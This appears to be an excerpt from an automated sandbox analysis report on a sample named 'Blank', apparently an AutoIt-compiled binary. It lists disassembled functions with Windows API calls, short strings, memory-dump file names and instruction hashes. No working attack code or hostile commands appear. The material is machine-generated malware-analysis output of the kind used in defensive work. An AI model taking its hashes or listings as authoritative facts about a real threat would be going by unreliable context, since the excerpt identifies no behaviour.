                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                                    • String ID: static
                                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                                    • Opcode ID: 4d564d87abbe1d79ab4bd668bf6dfc88c1d9cabf4f9bc6e8a22c491575cf8a1b
                                                                                                                                    • Instruction ID: c493a9d91577dad3a770659e97cff647cf84287c3edd2f3d0a8eb1d34529cada
                                                                                                                                    • Opcode Fuzzy Hash: 4d564d87abbe1d79ab4bd668bf6dfc88c1d9cabf4f9bc6e8a22c491575cf8a1b
                                                                                                                                    • Instruction Fuzzy Hash: 9F31CF71120645AEDB119F79CC80BFB73A9FF48760F509629F9A987191DB30ACA1CB60
                                                                                                                                    Function 002C3049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 002C30B8
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002C30F3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                                    • Opcode ID: ca91962679aa5b2afffbbe255db46f0680da1b4ed1fb9c37c1a6ae1f865fcde0
                                                                                                                                    • Instruction ID: a7bd733602365cd94f25ace24ee42ceb9a9ca886ccc6c95c03952ebc32cf667f
                                                                                                                                    • Opcode Fuzzy Hash: ca91962679aa5b2afffbbe255db46f0680da1b4ed1fb9c37c1a6ae1f865fcde0
                                                                                                                                    • Instruction Fuzzy Hash: D931F9315102069FDB24DF54C885FAEBBB8FF05350F18C91DE989A6191D7B09B64CB51
                                                                                                                                    Function 002D40B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __snwprintf.LIBCMT ref: 002D4132
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __snwprintf_memmove
                                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                    • API String ID: 3506404897-2584243854
                                                                                                                                    • Opcode ID: 0c89f7540cf0dbaf0e7b5419b5a44984e2b90974ca74ab40888f7ca6bd0be164
                                                                                                                                    • Instruction ID: 7e07a20b7df15be8e668e66169640bf48c6ce892fc03742d9c85b624ea35fe33
                                                                                                                                    • Opcode Fuzzy Hash: 0c89f7540cf0dbaf0e7b5419b5a44984e2b90974ca74ab40888f7ca6bd0be164
                                                                                                                                    • Instruction Fuzzy Hash: 3B21B430A20219ABCF15EF64C896EEE77B5AF54740F404056F909A7281DB70EDA5CFA1
                                                                                                                                    Function 002E6CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002E6D86
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002E6D91
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: Combobox
                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                    • Opcode ID: b8d94bc272836309a49bd68d6cb2351a796226dc92cb8f3a6d6eb7fc78837d1c
                                                                                                                                    • Instruction ID: 3881bddebafb8367a7d144c3749162129f51de91cb3ca5e9a87e98387d6bd180
                                                                                                                                    • Opcode Fuzzy Hash: b8d94bc272836309a49bd68d6cb2351a796226dc92cb8f3a6d6eb7fc78837d1c
                                                                                                                                    • Instruction Fuzzy Hash: 9111E671360249AFEF118E15DC85EFB3B6EEB943A4F900125F9189B290D6719C608B60
                                                                                                                                    Function 002E722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00262111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0026214F
                                                                                                                                      • Part of subcall function 00262111: GetStockObject.GDI32(00000011), ref: 00262163
                                                                                                                                      • Part of subcall function 00262111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0026216D
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 002E7296
                                                                                                                                    • GetSysColor.USER32(00000012), ref: 002E72B0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                    • String ID: static
                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                    • Opcode ID: 70795bba21532bc20ad0faac36befd521d36059f7e490d22d4d1e82b42a109c4
                                                                                                                                    • Instruction ID: ac59b361bdb36c4dcd73ef734203950731512735d32ab1c6db0e344777d70fad
                                                                                                                                    • Opcode Fuzzy Hash: 70795bba21532bc20ad0faac36befd521d36059f7e490d22d4d1e82b42a109c4
                                                                                                                                    • Instruction Fuzzy Hash: B021477266420AAFDB04DFB8CC46AFA7BA8FB08314F004528FE55D3251E634A861DB50
                                                                                                                                    Function 002731BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 002B032B
                                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 002B0375
                                                                                                                                      • Part of subcall function 00280284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00272A58,?,00008000), ref: 002802A4
                                                                                                                                      • Part of subcall function 002809C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002809E4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                    • String ID: X
                                                                                                                                    • API String ID: 3777226403-3081909835
                                                                                                                                    • Opcode ID: a49c946106b41a43f32b8e94e7457e8a33957d7f672685244e096536fa1ce1d7
                                                                                                                                    • Instruction ID: f991eb75b742239f8b277052782c92f22f382d849d6dd4362e2e9ef7bfd5c736
                                                                                                                                    • Opcode Fuzzy Hash: a49c946106b41a43f32b8e94e7457e8a33957d7f672685244e096536fa1ce1d7
                                                                                                                                    • Instruction Fuzzy Hash: 2F21D871A212489BDF46DF94C845BEE7BFCAF49310F00405AE408A7241DBF4599DDFA1
                                                                                                                                    Function 002C3156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 002C31C9
                                                                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002C31E8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                                    • Opcode ID: ca0a67015f03580c2d0afe092002ef008aac539d067c772a9cbce036c9c6e2af
                                                                                                                                    • Instruction ID: 734b71075d6f315affa5354ab6bc28c6ee9ac888332ec62cfa02e068118b1fb5
                                                                                                                                    • Opcode Fuzzy Hash: ca0a67015f03580c2d0afe092002ef008aac539d067c772a9cbce036c9c6e2af
                                                                                                                                    • Instruction Fuzzy Hash: 34112631921116AFDB21DE9CDC45F9D73B8AB09310F188629E809E7290D7F1AF15CB91
                                                                                                                                    Function 002D28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002D28F8
                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002D2921
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                    • String ID: <local>
                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                    • Opcode ID: 31dfedd9bd66dcd8aabd69ea8ee1e74bde58bcd9ea18553ed91c9908c165f664
                                                                                                                                    • Instruction ID: a0034fcd313378873cd4b9990280045cb9eb5de38a40cd5dfbe6bb676e45001e
                                                                                                                                    • Opcode Fuzzy Hash: 31dfedd9bd66dcd8aabd69ea8ee1e74bde58bcd9ea18553ed91c9908c165f664
                                                                                                                                    • Instruction Fuzzy Hash: A0119470511226FAEB158E518C89EF6FBA8EF25751F20812BF54596240D3705C68E6F0
                                                                                                                                    Function 002CD116 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscmp
                                                                                                                                    • String ID: 0.0.0.0$L,/
                                                                                                                                    • API String ID: 856254489-543169165
                                                                                                                                    • Opcode ID: eb880e6eb5362e78ed922a89af01f1921a67e9010c37b2715ba7f102ed2689a5
                                                                                                                                    • Instruction ID: 9985dadca0af4cdde69f0c606fe095f67d577a79efe916a69eadce96bf79098c
                                                                                                                                    • Opcode Fuzzy Hash: eb880e6eb5362e78ed922a89af01f1921a67e9010c37b2715ba7f102ed2689a5
                                                                                                                                    • Instruction Fuzzy Hash: A511B235620204EFCB04FE14C981EAAB3B4AF85710F14816DEA4D5B3A1CA70EDA6CB50
                                                                                                                                    Function 002D8475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002D86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,002D849D,?,00000000,?,?), ref: 002D86F7
                                                                                                                                    • #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002D84A0
                                                                                                                                    • #9.WSOCK32(00000000,?,00000000), ref: 002D84DD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                    • API String ID: 626452242-2422070025
                                                                                                                                    • Opcode ID: 310e8753b0b554ad9cd9a9c68bcd6bd61bc4e8dc36177c93d9fa31f06628b5e9
                                                                                                                                    • Instruction ID: 3c9aa8b60c7060b891458f24afd97da43c670e3cf44d4f1ce0f285e8b660f39b
                                                                                                                                    • Opcode Fuzzy Hash: 310e8753b0b554ad9cd9a9c68bcd6bd61bc4e8dc36177c93d9fa31f06628b5e9
                                                                                                                                    • Instruction Fuzzy Hash: 14118235110206ABDB10AF64DC46BEEB324EF44360F10856BEA1557392DB71A824CAA5
                                                                                                                                    Function 002B99BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                      • Part of subcall function 002BB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002BB7BD
                                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002B9A2B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                                    • Opcode ID: 3080820dba1e6b48bc90b22deb4a991e3c61b1b16fa35c206b09ea896fd08e2a
                                                                                                                                    • Instruction ID: bbbc4c3013098978cc003353e78b5baee47844a315bab7cde1fa597e1827b5c5
                                                                                                                                    • Opcode Fuzzy Hash: 3080820dba1e6b48bc90b22deb4a991e3c61b1b16fa35c206b09ea896fd08e2a
                                                                                                                                    • Instruction Fuzzy Hash: 8E019C71A62114AB8B14EFA8CC51CFEB369EF0A3A0B000709F8B5533C1DF301878DA10
                                                                                                                                    Function 0026BBC6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0026BC07
                                                                                                                                      • Part of subcall function 00271821: _memmove.LIBCMT ref: 0027185B
                                                                                                                                    • _wcscat.LIBCMT ref: 002A3593
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FullNamePath_memmove_wcscat
                                                                                                                                    • String ID: s2
                                                                                                                                    • API String ID: 257928180-687140649
                                                                                                                                    • Opcode ID: 8c6a56c309974151410f5cf5ef359212d3acbd8936c014dee27b4494e85d94ce
                                                                                                                                    • Instruction ID: 9b65d7c7897b586c32e579075ffee4fab90527a40d1695f53cbaaaca7eea600f
                                                                                                                                    • Opcode Fuzzy Hash: 8c6a56c309974151410f5cf5ef359212d3acbd8936c014dee27b4494e85d94ce
                                                                                                                                    • Instruction Fuzzy Hash: EF1165359242189BCB06EBA49942EDE77A8FF08350B1040AABA49D7251EF709BF45F91
                                                                                                                                    Function 002C934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fread_nolock_memmove
                                                                                                                                    • String ID: EA06
                                                                                                                                    • API String ID: 1988441806-3962188686
                                                                                                                                    • Opcode ID: 3b01a7557df03977bb78871b3cbe02310eb331b2ee958520cdbbf4850391f116
                                                                                                                                    • Instruction ID: daf3f30d2a7817ce0f8636cd6e13f4dd4eed764ddcd16f6f88e36b52e337619d
                                                                                                                                    • Opcode Fuzzy Hash: 3b01a7557df03977bb78871b3cbe02310eb331b2ee958520cdbbf4850391f116
                                                                                                                                    • Instruction Fuzzy Hash: CE01D6728142586EDB18DAA8C85AEEEBBF89F05301F00429FE552D21C1E5B5A6548B60
                                                                                                                                    Function 002B98B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                      • Part of subcall function 002BB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002BB7BD
                                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 002B9923
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                                    • Opcode ID: 7fcfcb514a1b38ed3b4781a04c90b6d5c09ecbdd0889e4898e91c7cc14e387a2
                                                                                                                                    • Instruction ID: aedd8c965fc3ca8b6ad232db5f889865729264d11162167dae052d2ebc986698
                                                                                                                                    • Opcode Fuzzy Hash: 7fcfcb514a1b38ed3b4781a04c90b6d5c09ecbdd0889e4898e91c7cc14e387a2
                                                                                                                                    • Instruction Fuzzy Hash: 93012B72A621047BCB15EFA4C952EFFB3AD9F19380F100119F94563281DE605E78DAB1
